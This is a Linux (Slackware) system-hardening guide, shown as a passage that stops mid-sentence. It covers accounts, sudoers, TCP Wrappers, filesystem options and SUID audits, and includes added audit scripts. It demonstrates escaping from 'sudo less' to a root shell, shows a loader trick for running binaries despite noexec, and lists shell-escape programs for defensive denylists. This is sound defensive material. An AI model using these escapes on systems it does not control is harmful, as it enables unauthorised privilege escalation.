root@darkstar:~# ps -eo euser,ruser,suser,fuser,f,comm,label
root@darkstar:~# sa -m
root@darkstar:~# lastcomm
By default, the unused accounts have their shell set to /bin/false.
This prevents the accounts from being used interactively. Some argue
that deleting the accounts is excessive and unnecessary. I delete them.
Error generated when logging into an account with the shell set as
/bin/false (from Slackware 11.0):
darkstar login: test
Password: *************************
Linux 2.4.32
Last login: Wed Jun 27 20:23:42 -0700 2001 on tty2
No mail.
Welcome to Linux 2.4.32 (tty2)
darkstar login:
The unused accounts may vary and depend on the daemons that run on your
system. I typically delete the following:
root@darkstar:~# userdel adm
adm
games
gdm
halt
lp
news
operator
oprofile
pop
rpc
shutdown
sync
uucp
The accounts sync, halt, and shutdown don't work by default. They allow
someone to su or login to sync, halt, or shutdown the system. A password
would have to be set before they work, as well as adding them to any of the
other files that can be used to restrict logins or the use of su. Unless
you really want to give someone the ability to do any of the three, it's
safe to delete the accounts.
root@darkstar:~# su halt
halt: must be superuser.
root@darkstar:~# su shutdown
shutdown: you must be root to do that!
root@darkstar:~# userdel halt
root@darkstar:~# userdel shutdown
root@darkstar:~# userdel sync
Password aging:
Note: Don't use this if you like to make the /etc/passwd and the
/etc/shadow files immutable (chattr +i ...). It gets ugly... If you
let the password expire, you will not be able to login until you reset
the password. But if the /etc/shadow file is immutable and cannot be
changed, then you will not be able to login. To fix the problem, you
would have to boot tomsrtbt or a Linux boot CD, mount the hard drive
partition where /etc is located, and remove the immutable attribute
from /mnt/etc/shadow (chattr -i ...).
Set the maximum number of days a password remains valid. For users,
disable the account after the password has expired and the account remains
inactive for 30 days.
root@darkstar:~# passwd -x 90 -w 7 root
root@darkstar:~# passwd -x 90 -w 7 -i 30 dentonj
Check the status of each account and the integrity of the passwd file:
root@darkstar:~# for i in `cat /etc/passwd | awk -F: '{print $1}'`; do
> passwd -S $i
> done
root@darkstar:~# pwck
man 1 passwd
man 5 passwd
man find
man userdel
man false
man pwck
man ps
man sa
man lastcomm
/etc/group:
According to the Linux Standard Base Specification 4.1, the only required
groups are root, bin, and daemon. All other groups are optional. Delete
any unused groups. The following lists the number of files and directories
that belong to each group:
root@darkstar:~# for i in `cat /etc/group | awk -F: '{print $1}'`; do
> echo -n "$i - "
> find / -group $i -ignore_readdir_race | wc -l
> done
root - 373328
bin - 83
daemon - 11
sys - 1
adm - 0
tty - 147
disk - 31
lp - 12
mem - 0
kmem - 3
wheel - 0
floppy - 26
mail - 6
news - 47
uucp - 16
man - 0
dialout - 4
audio - 12
video - 3
cdrom - 2
games - 0
slocate - 3
utmp - 4
smmsp - 3
tape - 0
mysql - 2
rpc - 0
sshd - 0
gdm - 0
shadow - 4
ftp - 0
oprofile - 0
apache - 1
messagebus - 7
haldaemon - 14
plugdev - 2
power - 0
netdev - 0
pop - 0
scanner - 1
nobody - 2
nogroup - 2
users - 2700
console - 0
Your numbers may vary. To list the files owned by a particular group:
root@darkstar:~# find / -group nobody -ls
root@darkstar:~# groupdel adm
Repeat for the following:
adm
games
lp
news
pop
uucp
root@darkstar:~# grpck
Removing accounts may create a long list of files that no longer belong to
any user or group. If you are interested in what the files are:
root@darkstar:~# find / \( -nouser -o -nogroup \) -ls > unowned.out
The parentheses matter: without them, find applies -ls only to the
-nogroup test and silently skips the files with no owner.
To change the ownership of the files:
root@darkstar:~# find / \( -nouser -o -nogroup \) -exec chown root:root {} \;
man group
man find
man groupdel
man grpck
man chown
/etc/sudoers:
Defaults runaspw
Defaults ! root_sudo
Defaults ignore_dot
Defaults tty_tickets
Defaults requiretty
Defaults listpw=always
Defaults verifypw=always
Defaults !path_info
Defaults noexec
Defaults passwd_timeout=1
Defaults env_reset
Defaults insults
%wheel ALL=(ALL) ALL
root@darkstar:~# groups dentonj
dentonj : users
root@darkstar:~# usermod -g users -G wheel dentonj
root@darkstar:~# groups dentonj
dentonj : users wheel
root@darkstar:~# mkdir /var/run/sudo
There are a number of security concerns when allowing users to use sudo.
Make sure you completely read the man pages for sudo and sudoers.
There are generally two approaches when configuring sudo. The first is to
allow the user to run any command. This is essentially giving them su
access to root.
The second approach is to only allow a limited number of commands to be
run. If you are going to use the second approach, there are a few commands
that you don't want to allow the user to run. These commands can be abused
to give the user full access to the system.
Make sure you don't add the following or those listed in the Shell Escapes
section below to the /etc/sudoers file:
/bin/cat
/bin/chmod
/bin/chown
/bin/cpio
/bin/mount
/bin/rpm
/bin/tar
/sbin/installpkg
/usr/bin/env
/usr/sbin/useradd
/usr/sbin/usermod
This list should be much longer.
root@darkstar:~# sudo -V
root@darkstar:~# sudo -L
man sudo
man sudoers
man visudo
man groups
man usermod
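As an added example (not part of the original document), the following script checks a sudoers file for the commands listed above and for the catch-all "ALL". The sample sudoers content it contains is constructed, and the parsing is deliberately simple: it does not expand command aliases, so a risky command placed in a Cmnd_Alias is reported on the line that defines the alias rather than on the user line that uses it.

```shell
#!/bin/sh
# Added example, not from the original document. Scans a sudoers-style
# file for the commands the section above says should never be handed
# out through sudo, plus the catch-all "ALL". Command aliases are not
# expanded: a risky command hidden in a Cmnd_Alias is reported on the
# alias line where it is defined. Host and runas fields are ignored.

# The binaries listed in the text as giving a user full access.
RISKY='/bin/cat /bin/chmod /bin/chown /bin/cpio /bin/mount /bin/rpm /bin/tar /sbin/installpkg /usr/bin/env /usr/sbin/useradd /usr/sbin/usermod'

# sudoers_risky_commands FILE
# Print "who: command" for each risky command or ALL found on a user,
# group or alias specification line. Defaults lines, comments and blank
# lines are skipped. FILE may be "-" to read standard input.
sudoers_risky_commands() {
    awk -v risky="$RISKY" '
        BEGIN {
            n = split(risky, r, " ")
            for (i = 1; i <= n; i++) isrisky[r[i]] = 1
        }
        /^[[:space:]]*#/ || /^[[:space:]]*$/ { next }
        /^[[:space:]]*Defaults/ { next }
        {
            eq = index($0, "=")
            if (eq == 0) next
            who = $1
            if ($1 ~ /_Alias$/) who = $1 " " $2
            cmds = substr($0, eq + 1)
            sub(/^[[:space:]]*\([^)]*\)/, "", cmds)   # drop the (runas) list
            gsub(/[A-Z]+:/, "", cmds)                  # drop tags such as NOPASSWD:
            gsub(/,/, " ", cmds)                       # one command per field
            nf = split(cmds, f, " ")
            for (i = 1; i <= nf; i++)
                if (f[i] == "ALL" || (f[i] in isrisky))
                    printf "%s: %s\n", who, f[i]
        }' "$1"
}

# Constructed sample (not a real sudoers file): an alias that carries
# /bin/tar, a wheel entry that grants everything, and a per-user line
# that allows cat even though its argument is restricted.
sample_sudoers() {
    cat <<'EOF'
# constructed sample
Defaults requiretty
Defaults noexec
Cmnd_Alias BACKUP = /bin/tar, /usr/bin/rsync
%wheel ALL=(ALL) ALL
dentonj ALL=(root) NOPASSWD: /sbin/shutdown -h now, /bin/cat /var/log/messages
operator ALL=(root) BACKUP
EOF
}

# Real use (as root): sudoers_risky_commands /etc/sudoers
sample_sudoers | sudoers_risky_commands -
```

The "%wheel ALL=(ALL) ALL" line from the configuration above is reported on purpose: it is the first approach described in the text, and the check exists for installations that chose the second one.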
/etc/ftpusers:
This file is used to deny anyone listed from being able to log into the
local ftp server. Add the following:
bin
daemon
haldaemon
mail
smmsp
messagebus
mysql
sshd
nobody
Add all system accounts that are present in /etc/passwd.
man ftpusers
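The account review in the /etc/passwd section and the "add all system accounts" step for /etc/ftpusers both need the same thing, a list of system accounts pulled from /etc/passwd. The following is an added example, not part of the original document, covering both: it assumes system accounts are those with a UID below 1000 (UID_MIN in login.defs) and that /bin/false or /sbin/nologin mark an account that must not log in; the passwd file it ships with is constructed.

```shell
#!/bin/sh
# Added example, not from the original document. Helpers for the account
# review in the /etc/passwd section and for filling /etc/ftpusers. They
# assume the Slackware convention that system accounts have a UID below
# 1000 (UID_MIN in login.defs) and that /bin/false or /sbin/nologin mark
# an account that must not log in interactively.

# system_accounts PASSWD [MAXUID]: names of all accounts with UID < MAXUID.
# PASSWD may be "-" to read standard input.
system_accounts() {
    awk -F: -v max="${2:-1000}" '$3 < max { print $1 }' "$1"
}

# interactive_system_accounts PASSWD [MAXUID]: system accounts other than
# root whose shell would let someone log in. On a default install this
# should print nothing; anything listed deserves a look.
interactive_system_accounts() {
    awk -F: -v max="${2:-1000}" \
        '$3 < max && $3 != 0 && $7 != "/bin/false" && $7 != "/sbin/nologin" { print $1 }' "$1"
}

# ftpusers_from_passwd PASSWD [MAXUID]: every account that should be denied
# ftp: all system accounts (root included) and any account without a
# usable shell. Redirect the output into /etc/ftpusers.
ftpusers_from_passwd() {
    awk -F: -v max="${2:-1000}" \
        '$3 < max || $7 == "/bin/false" || $7 == "/sbin/nologin" { print $1 }' "$1"
}

# Constructed passwd file for demonstration; the "news" shell was set to
# /bin/bash on purpose so the interactive check has something to report.
sample_passwd() {
    cat <<'EOF'
root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/log:/bin/false
news:x:9:13:news:/usr/lib/news:/bin/bash
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/false
sshd:x:33:33:sshd:/:/bin/false
nobody:x:99:99:nobody:/:/bin/false
dentonj:x:1000:100:Jeffrey Denton:/home/dentonj:/bin/bash
EOF
}

# Real use: interactive_system_accounts /etc/passwd
#           ftpusers_from_passwd /etc/passwd > /etc/ftpusers
echo "system accounts with a login shell:"
sample_passwd | interactive_system_accounts -
echo "ftpusers:"
sample_passwd | ftpusers_from_passwd -
```

Compare the output of ftpusers_from_passwd with the existing /etc/ftpusers before replacing it, so that an account you deliberately allow to use ftp is not denied by the regenerated list.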
/etc/host.conf:
nospoof on
spoofalert on
spoof warn
man host.conf
/etc/hosts.allow:
TCP Wrappers
all:local:banners /etc/banners:allow
sshd:192.168.1.:banners /etc/banners:allow
sendmail:all:banners /etc/banners:allow
all:paranoid:spawn /usr/bin/logger "%d deny paranoid %c %p %a %h %u" \
:banners /etc/banners:deny
all:all:spawn /usr/bin/logger "%d deny %c %p %a %h %u" \
:banners /etc/banners:deny
From `man hosts_options`:
banners /some/directory
Look for a file in `/some/directory` with the same
name as the daemon process (for example in.telnetd
for the telnet service), and copy its contents to
the client.
If you are using any of the services listed below, make sure you add an
allow rule for it. If you want a different banner for a particular
service, delete the symlink and create a text file with the same name.
root@darkstar:~# mkdir /etc/banners && cd /etc/banners
root@darkstar:/etc/banners# ln -s ../issue.net afpd
root@darkstar:/etc/banners# ln -s ../issue.net imapd
root@darkstar:/etc/banners# ln -s ../issue.net in.identd
root@darkstar:/etc/banners# ln -s ../issue.net in.rexecd
root@darkstar:/etc/banners# ln -s ../issue.net in.rlogind
root@darkstar:/etc/banners# ln -s ../issue.net in.rshd
root@darkstar:/etc/banners# ln -s ../issue.net in.telnetd
root@darkstar:/etc/banners# ln -s ../issue.net popa3d
root@darkstar:/etc/banners# ln -s ../issue.net proftpd
root@darkstar:/etc/banners# ln -s ../issue.net rpc.mountd
root@darkstar:/etc/banners# ln -s ../issue.net sendmail
root@darkstar:/etc/banners# ln -s ../issue.net sshd
root@darkstar:/etc/banners# ln -s ../issue.net stunnel
root@darkstar:/etc/banners# ln -s ../issue.net uucico
root@darkstar:/etc/banners# ln -s ../issue.net vsftpd
A command that can be used to determine which daemons use TCP Wrappers.
Dynamically linked daemons get the check from libwrap.so, so look for that
library with ldd; only a statically linked daemon carries the hosts.allow
string in its own binary, which is what the old strings check looked for:
root@darkstar:~# cd /usr/sbin; for i in *; do [ -f "$i" ] && [ ! -L "$i" ] || continue; \
ldd "$i" 2>/dev/null | grep -q libwrap && echo " $i"; done | less
To test the /etc/hosts.allow settings:
root@darkstar:~# tcpdchk
root@darkstar:~# tcpdmatch sshd localhost
root@darkstar:~# tcpdmatch sshd 1.1.1.1
root@darkstar:~# tcpdmatch sshd 192.168.1.1
man tcpd
man 5 hosts_access
man hosts_options
man tcpdchk
man tcpdmatch
/etc/hosts.deny:
The only time this file will match is when /etc/hosts.allow is
misconfigured.
all:all:spawn /usr/bin/logger "Check hosts.allow - %d deny %c %p %a %h %u" \
:banners /etc/banners:deny
man tcpd
man 5 hosts_access
man hosts_options
xdm:
/etc/X11/xdm/xdm-config:
DisplayManager*authorize: true
DisplayManager*authName: XDM-AUTHORIZATION-1 MIT-MAGIC-COOKIE-1
DisplayManager.requestPort: 0
man xdm
/etc/X11/xdm/Xresources:
xlogin*greeting: Unauthorized Access Prohibited
xlogin*allowRootLogin: false
xlogin*allowNullPasswd: false
man xdm
xhost:
dentonj@darkstar:~$ xhost
access control enabled, only authorized clients can connect
dentonj@darkstar:~$
If the following line shows up:
INET:localhost
dentonj@darkstar:~$ xhost -localhost
man xhost
man Xsecurity
man Xau
man Xserver
/etc/kde/kdm/kdmrc:
You may not want to set some of these. For example, if the system uses
a runlevel of 4 and is installed on a laptop, you may want to set
"AllowShutdown=All". Read the comments in the file.
[Xdmcp]
Enable=false
Port=0
Willing=
[X-*-Core]
AllowRootLogin=false
AllowNullPasswd=false
AllowShutdown=Root
AllowSdForceNow=Root
UseSessReg=true
[X-:*-Core]
ServerArgsLocal=-nolisten tcp
AllowNullPasswd=false
AllowShutdown=Root
NoPassEnable=false
#NoPassUsers=
[X-:0-Core]
AutoLoginEnable=false
#AutoLoginUser=
#AutoLoginPass=
dentonj@darkstar:~$ /usr/share/config/kdm/Xwilling
2 users, load: 0.00, 0.00, 0.00
/etc/kde/kdm/Xaccess:
Comment out the following lines:
#* #any host can get a login window
#* CHOOSER BROADCAST #any indirect host can get a chooser
Access Control Lists:
/etc/fstab:
Add the acl mount option:
/dev/sda3 / ext4 defaults,acl 1 1
root@darkstar:~# mount
/dev/root on / type ext4 (rw,relatime,barrier=1,data=ordered)
root@darkstar:~# mount -o remount,rw,relatime,acl,barrier=1,data=ordered /
root@darkstar:~# mount
/dev/root on / type ext4 (rw,relatime,acl,barrier=1,data=ordered)
root@darkstar:~# touch test
root@darkstar:~# getfacl test
# file: test
# owner: root
# group: root
user::rw-
group::r--
other::r--
root@darkstar:~# setfacl -m u:dentonj:rw test
root@darkstar:~# getfacl test
# file: test
# owner: root
# group: root
user::rw-
user:dentonj:rw-
group::r--
mask::rw-
other::r--
man acl
man setfacl
man getfacl
/etc/inittab:
Comment out the following line:
#ca::ctrlaltdel:/sbin/shutdown -t5 -r now
root@darkstar:~# telinit q
[rant]
I actually don't think this is necessary. But I'm including it because
just about every security document on Linux recommends it. It stops anyone
from being able to reboot the system by doing a three finger salute.
Pressing Ctrl-Alt-Del to reboot the system only works if you have physical
access to the keyboard. Even if you disable this feature, it doesn't stop
someone from pulling the power cord or pressing the reset switch to force a
reboot. Most window managers trap Ctrl-Alt-Del anyways.
The only time that I see disabling the above line as being useful is when
you have a Windows admin using Linux. You don't want them rebooting the
system every time they want to lock the system or go to the Task Manager.
Or you can use /etc/shutdown.allow to control when (not exactly who) the
system can be rebooted with Ctrl-Alt-Del. There are security concerns with
using this method. Check the man page for shutdown for details.
[/rant]
Add "-a" to the following line in /etc/inittab to use
/etc/shutdown.allow:
ca::ctrlaltdel:/sbin/shutdown -t5 -r now -a
root@darkstar:~# telinit q
I like to use dumb terminals. Uncomment the following line:
s1:12345:respawn:/sbin/agetty -L ttyS0 9600 vt100
root@darkstar:~# telinit q
man init
man inittab
man initscript
man shutdown
man telinit
/etc/shutdown.allow:
dentonj
man shutdown
/etc/securetty:
Make sure only the following are uncommented:
console
tty1
tty2
tty3
tty4
tty5
tty6
man securetty
umask:
There are several ways to set umask:
/etc/login.defs:
UMASK 077
/etc/limits:
* K077
/etc/profile:
umask 077
Umask controls what the initial permissions are for newly created files and
directories. With a umask of 022, new files have the permissions of 644
and new directories have the permissions of 755. Setting the umask to 077
will result in new files being created with the permissions of 600 and new
directories will have the permissions of 700.
Using the umask of 077 will keep others from being able to access users'
files. Using a umask of 022 will allow others access to the users' files
unless the user takes the time to change the permissions. You can use
cron to periodically remove permissions from the users' home directories.
Setting a restrictive umask can cause problems when you commonly edit
or create files that need to be readable by everyone. An example
of files that everyone needs to be able to read are web server pages
located in /srv/httpd/htdocs.
dentonj@darkstar:~$ type -a umask
man bash
man umask
man login.defs
man limits
----[ Filesystem ]----
/etc/fstab:
/dev/sda1 swap swap defaults 0 0
/dev/sda2 / ext4 defaults,acl 1 1
/dev/sda6 /var ext4 rw,nosuid,nodev,acl,relatime,barrier=1,data=ordered 0 2
/dev/sda7 /tmp ext4 rw,nosuid,nodev,noexec,acl,relatime,barrier=1,data=ordered 0 2
/dev/sda8 /usr ext4 ro,acl 0 2
/dev/sda9 /home ext4 rw,nosuid,nodev,acl,relatime,barrier=1,data=ordered 0 0
/dev/sdb1 /mnt/windows vfat rw,nosuid,nodev,noexec,noauto 0 0
/dev/sdb2 /mnt/slack ext2 rw,noauto 0 0
/dev/cdrom /mnt/cdrom auto noauto,owner,ro 0 0
/dev/fd0 /mnt/floppy auto noauto,owner 0 0
devpts /dev/pts devpts gid=5,mode=620 0 0
proc /proc proc defaults 0 0
tmpfs /dev/shm tmpfs defaults 0 0
root@darkstar:~# mkdir /mnt/windows
root@darkstar:~# mkdir /mnt/slack
root@darkstar:~# mkdir /mnt/floppy
root@darkstar:~# mkdir /mnt/thumb
The lines need to wrap. Mount complains about bad options if "\" is used
to break up the lines. Mounting /usr as read-only used to work, but I
have not tested it with Slackware 13.1. Running "lsof" didn't turn up
files that looked like they may be written to in /usr. Your mileage may
vary. Test extensively before using in a production environment. Before
packages can be updated, /usr would have to be remounted as rw. This is
more of a good idea fairy type of idea. I'm on the fence as to whether
or not it adds any security to the system.
man fstab
man nfs
man mount
I used to add "noexec" to /home, but that mount option is pretty trivial to
bypass: a script can always be handed to its interpreter (sh ./script.sh),
which never needs execute permission on the file, and a binary can be run
through the dynamic loader. Besides, I like having a ~/bin directory for
my scripts.
dentonj@darkstar:~$ /lib/ld-linux.so.2 ./some_executable
man ld.so
/sbin/tune2fs:
root@darkstar:~# tune2fs -l /dev/sda3
man tune2fs
man fsck
/usr/bin/chattr:
TODO
Make these files immutable:
- init/rc scripts
- shell, environment, login config files
- passwd files
- server config files
- suid/sgid executables
- commonly trojaned executables
chattr +i /etc/rc.d/* /etc/apache/* /etc/mail/*
find / -type f \( -perm -4000 -o -perm -2000 \) -exec chattr +i {} \;
chattr +i /etc/at.deny
chattr +i /etc/exports
chattr +i /etc/ftpusers
chattr +i /etc/host.conf
chattr +i /etc/hosts
chattr +i /etc/hosts.allow
chattr +i /etc/hosts.deny
chattr +i /etc/hosts.equiv
chattr +i /etc/hosts.lpd
chattr +i /etc/inetd.conf
chattr +i /etc/inittab
chattr +i /etc/lilo.conf
chattr +i /etc/login.access
chattr +i /etc/login.defs
chattr +i /etc/named.conf
chattr +i /etc/porttime
chattr +i /etc/profile
chattr +i /etc/protocols
chattr +i /etc/securetty
chattr +i /etc/services
chattr +i /etc/suauth
chattr +i /home/dentonj/.forward
chattr +i /home/dentonj/.netrc
chattr +i /home/dentonj/.rhosts
chattr +i /home/dentonj/.shosts
less /usr/local/sbin/chkrootkit
/TROJAN
chattr +i <the commands listed in the variable TROJAN>
This list should be much longer.
Removing world access to chattr and lsattr only hides the tools: setting or
clearing +i (and +a) already requires CAP_LINUX_IMMUTABLE, which an
unprivileged user does not have, so treat this as obscurity rather than a
control.
root@darkstar:~# chmod go-rwx /usr/bin/chattr /usr/bin/lsattr
man chattr
lcap:
TODO
TODO - list where it can be found and how to compile it.
lcap removes CAP_LINUX_IMMUTABLE from the system-wide capability bounding
set (/proc/sys/kernel/cap-bound). This prevents the +i attribute from being
removed. I run `lcap` from rc.local. This file is sourced from the file
rc.M. To remove the +i attribute from a file, you'll have to reboot the
system and go into single user mode. This is one of the few times when you
really have to reboot Linux.
Caveat: the system-wide bounding set and the cap-bound sysctl were removed
in kernel 2.6.25 (the bounding set is per-process since then and is dropped
with prctl(PR_CAPBSET_DROP)), so lcap has no effect on the 2.6.33 kernel
that ships with Slackware 13.1. The example output below is from an older
kernel.
If you only access and manage the system remotely, using lcap may cause
problems.
Note: Do this after you are finished with configuring your system.
/etc/rc.d/rc.local:
/usr/local/sbin/lcap CAP_LINUX_IMMUTABLE
root@darkstar:~# touch /tmp/test
root@darkstar:~# chattr +i /tmp/test
root@darkstar:~# lsattr /tmp/test
----i-------- /tmp/test
root@darkstar:~# cd
root@darkstar:~# lcap CAP_LINUX_IMMUTABLE
root@darkstar:~# chattr -i /tmp/test
chattr: Operation not permitted while setting flags on /tmp/test
root@darkstar:~# lcap
Current capabilities: 0xFFFFFCFF
0) *CAP_CHOWN 1) *CAP_DAC_OVERRIDE
2) *CAP_DAC_READ_SEARCH 3) *CAP_FOWNER
4) *CAP_FSETID 5) *CAP_KILL
6) *CAP_SETGID 7) *CAP_SETUID
8) CAP_SETPCAP 9) CAP_LINUX_IMMUTABLE
10) *CAP_NET_BIND_SERVICE 11) *CAP_NET_BROADCAST
12) *CAP_NET_ADMIN 13) *CAP_NET_RAW
14) *CAP_IPC_LOCK 15) *CAP_IPC_OWNER
16) *CAP_SYS_MODULE 17) *CAP_SYS_RAWIO
18) *CAP_SYS_CHROOT 19) *CAP_SYS_PTRACE
20) *CAP_SYS_PACCT 21) *CAP_SYS_ADMIN
22) *CAP_SYS_BOOT 23) *CAP_SYS_NICE
24) *CAP_SYS_RESOURCE 25) *CAP_SYS_TIME
26) *CAP_SYS_TTY_CONFIG
* = Capabilities currently allowed
/etc/cron.*:
root@darkstar:~# chmod -R go-rwx /etc/cron.*
/etc/rc.d:
The system startup scripts are world readable by default.
root@darkstar:~# chmod -R go-rwx /etc/rc.d/
$HOME:
Limit access to $HOME directories:
root@darkstar:~# chmod -R go-rwx /home/dentonj
root@darkstar:~# chmod -R go-rwx /root
man chmod
/var/log:
Limit access to logs:
root@darkstar:~# chmod -R o-rwx /var/log
The following files should be empty if they exist:
/etc/X0.hosts
/etc/d_passwd
/etc/dialups
/etc/environment
/etc/exports
/etc/hosts.lpd
/etc/hosts.equiv
/etc/ssh/shosts.equiv
~/.forward
~/.netrc
~/.rhosts
~/.shosts
Files that normally shouldn't exist:
/etc/fastboot
/etc/forcefsck
/etc/hushlogins
/etc/initrunlvl
/etc/initscript
/etc/nologin
/etc/powerstatus
/etc/upsstatus
~/.hushlogin
Find SUID/SGID files and directories:
root@darkstar:~# find / -type f \( -perm -4000 -o -perm -2000 \) \
> -ls > suid_files.out
root@darkstar:~# find / -type d \( -perm -4000 -o -perm -2000 \) \
> -ls > suid_dirs.out
Find world and group writable files and directories:
root@darkstar:~# find / -type f \( -perm -2 -o -perm -20 \) \
> -ls > write_files.out
root@darkstar:~# find / -type d \( -perm -2 -o -perm -20 \) \
> -ls > write_dirs.out
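The find commands above are most useful when their output is kept and compared
later. The script below is an added example, not part of the original
document: it records a baseline of SUID/SGID files, reports what appeared or
vanished on a later run (a new SUID root file is a classic backdoor, and
package upgrades bring the bits back), and lists world-writable paths outside
sticky directories. It assumes GNU find for -printf and -xdev; the function
names are mine.

```shell
#!/bin/sh
# perms_audit.sh - baseline SUID/SGID files and re-check them later, plus a
# world-writable scan. Added example, not from the original document.
# Assumes GNU find (Slackware ships it) for -printf and -xdev.

# List SUID/SGID regular files below $1 (one filesystem) as "mode owner path",
# sorted in the C locale so the output can be fed straight to comm(1).
suid_list() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) \
        -printf '%m %u %p\n' 2>/dev/null | LC_ALL=C sort
}

# World-writable files and directories below $1, ignoring sticky directories
# such as /tmp where world-writable is expected.
world_writable_list() {
    find "$1" -xdev \( -type f -o -type d \) -perm -0002 ! -perm -1000 \
        -printf '%m %u %p\n' 2>/dev/null | LC_ALL=C sort
}

# Compare a saved baseline ($1, written by suid_list) with the tree $2 now.
# Prints "+ line" for new SUID/SGID files and "- line" for ones that vanished;
# returns 1 when anything changed so a cron job can mail the output to root.
suid_diff() {
    baseline=$1
    current=$(mktemp) || return 2
    suid_list "$2" > "$current"
    added=$(LC_ALL=C comm -13 "$baseline" "$current")
    removed=$(LC_ALL=C comm -23 "$baseline" "$current")
    rm -f "$current"
    [ -z "$added" ] && [ -z "$removed" ] && return 0
    [ -n "$added" ] && printf '%s\n' "$added" | sed 's/^/+ /'
    [ -n "$removed" ] && printf '%s\n' "$removed" | sed 's/^/- /'
    return 1
}
```

Save `suid_list / > /root/suid.baseline` right after the install, then call
`suid_diff /root/suid.baseline /` from a cron.daily script; cron mails any
change to root, and nothing is mailed when the list is unchanged.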
SUID/SGID:
TODO
Remove the SUID or SGID bit from the following files. Package upgrades
reinstall files with the modes stored in the package, so re-apply this after
running upgradepkg:
chmod u-s /usr/bin/at
chmod u-s /usr/bin/chage
chmod u-s /usr/bin/chfn
chmod u-s /usr/bin/chsh
chmod u-s /usr/bin/crontab
chmod u-s /usr/bin/expiry
chmod u-s /usr/bin/gpasswd
chmod u-s /usr/bin/lppasswd
chmod u-s /usr/bin/newgrp
chmod u-s /usr/bin/rcp
chmod u-s /usr/bin/rlogin
chmod u-s /usr/bin/rsh
chmod u-s /usr/libexec/ssh-keysign
man chmod
Shell Escapes:
The following is a list of programs that can escape to a shell. This can
either be done by directly starting a new shell, executing shell commands
(which is used to start a shell), or by opening an text editor that can be
used to start a shell.
These programs are not a security concern by themselves. However, if they
are set SUID root or used with sudo, the programs can allow users access to
a root shell.
/etc/sudoers:
dentonj ALL = (ALL) /usr/bin/less /var/log/messages
Start a new shell:
dentonj@darkstar:~$ sudo /usr/bin/less /var/log/messages
Password:
<contents of /var/log/messages>
!
bash-3.00#
Open an editor that can start a new shell:
dentonj@darkstar:~$ sudo /usr/bin/less /var/log/messages
Password:
<contents of /var/log/messages>
v
:sh
bash-3.00#
Make sure none of these are SUID root. Also make sure they don't
end up in /etc/sudoers. This list is not complete.
/bin/ed /bin/more
/usr/bin/bzmore /usr/bin/crontab -e
/usr/bin/cscope /usr/bin/cu
/usr/bin/cvs -e /usr/bin/cvsbug
/usr/bin/elm /usr/bin/elvis
/usr/bin/ex /usr/bin/flea
/usr/bin/gccbug /usr/bin/gdb
/usr/bin/less /usr/bin/lftp
/usr/bin/mailto /usr/bin/mc
/usr/bin/mcedit /usr/bin/mcview
/usr/bin/mutt /usr/bin/mysql
/usr/bin/mysqlbug /usr/bin/nail
/usr/bin/ncftp /usr/bin/newspost
/usr/bin/nn /usr/bin/perlbug
/usr/bin/pilot /usr/bin/pine
/usr/bin/pg /usr/bin/rpcclient
/usr/bin/sdiff /usr/bin/slrn
/usr/bin/smbclient /usr/bin/tin
/usr/bin/trn /usr/bin/uupick
/usr/bin/vim /usr/bin/zmore
A couple of the things that I used to figure out which commands allow shell
escapes. Programs that honour $VISUAL or $EDITOR will run whatever those
variables point to, and man pages that talk about executing a command are
usually describing a "!" escape:
root@darkstar:~# cd /usr/bin && for i in *; do
> [ -f "$i" ] && [ ! -L "$i" ] || continue
> echo " $i"
> strings "$i" | grep -E "VISUAL|EDITOR"
> done | less
root@darkstar:~# cd /usr/man/man1 && zgrep -E \
> "\!.*command|execute.*command" *
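The two lists, the commands not to put in sudoers and the shell escape list
above, can be checked mechanically rather than by eye. The script below is an
added example, not from the original document: it extracts the command
granted by every rule in a sudoers-format file and warns about ALL or any
command on a constructed denylist. It understands the plain
"user HOST = (RUNAS) [TAG:] command, command" form and Cmnd_Alias lines;
the denylist is deliberately short and the function names are mine.

```shell
#!/bin/sh
# sudoers_audit.sh - flag sudoers rules that hand out a root shell through the
# back door. Added example, not part of the original document; the denylist is
# constructed from the two lists above and is deliberately incomplete.

# Commands that escape to a shell or can be abused to take over the system.
SHELL_ESCAPES="/bin/ed /bin/more /usr/bin/less /usr/bin/vim /usr/bin/ex
/usr/bin/gdb /usr/bin/mc /usr/bin/mutt /usr/bin/env /bin/tar /bin/cpio
/bin/mount /bin/chmod /bin/chown /usr/bin/crontab /usr/sbin/useradd"

# Print the command path granted by every specification in a sudoers file.
# Comments, Defaults and User_/Host_/Runas_Alias lines are skipped;
# Cmnd_Alias lines are kept because the commands they define get granted
# somewhere.
sudoers_commands() {
    sed -e 's/#.*//' "$1" \
    | grep -Ev '^[[:space:]]*(Defaults|User_Alias|Host_Alias|Runas_Alias)' \
    | awk '/=/ {
        rule = $0
        sub(/^[^=]*=[[:space:]]*/, "", rule)   # drop "user host ="
        gsub(/\([^)]*\)/, "", rule)            # drop "(runas)"
        gsub(/[A-Z]+:/, "", rule)              # drop tags such as NOPASSWD:
        n = split(rule, cmds, ",")
        for (i = 1; i <= n; i++) {
            split(cmds[i], w, " ")             # first word is the command
            if (w[1] != "") print w[1]
        }
    }'
}

# Report every granted command that is ALL or on the denylist. Returns 1 if
# anything was flagged, so it can gate "visudo -c" in a deploy script.
sudoers_audit() {
    bad=0
    for cmd in $(sudoers_commands "$1"); do
        if [ "$cmd" = ALL ]; then
            echo "WARN: ALL grants an unrestricted root shell"
            bad=1
            continue
        fi
        for esc in $SHELL_ESCAPES; do
            if [ "$cmd" = "$esc" ]; then
                echo "WARN: $cmd can escape to a root shell"
                bad=1
            fi
        done
    done
    return $bad
}
```

Run `sudoers_audit /etc/sudoers` before `visudo -c`; a non-zero exit means a
rule grants something that can be turned into a root shell and needs a second
look.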
Find and delete dead symlinks:
find / -type l -print | perl -nle '-e || print'
----[ Network ]----
/etc/rc.d/rc.local:
# Stop arp spoofing used to sniff switched networks
# Set a static ARP entry for the default gateway
arp -s 192.168.1.1 00:00:FE:ED:FA:CE
# Set a static ARP entry for the log host
arp -s 192.168.1.2 00:00:DE:AD:BE:EF
/etc/rc.d/rc.firewall:
The file /etc/rc.d/rc.inet2 checks for the existence of rc.firewall and then
runs it. Create a firewall script and place it here.
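An rc.firewall to put there, as an added example that is not part of the
original document: default-deny on INPUT and FORWARD, ssh only from the LAN,
everything else logged (rate limited) and dropped, loaded atomically through
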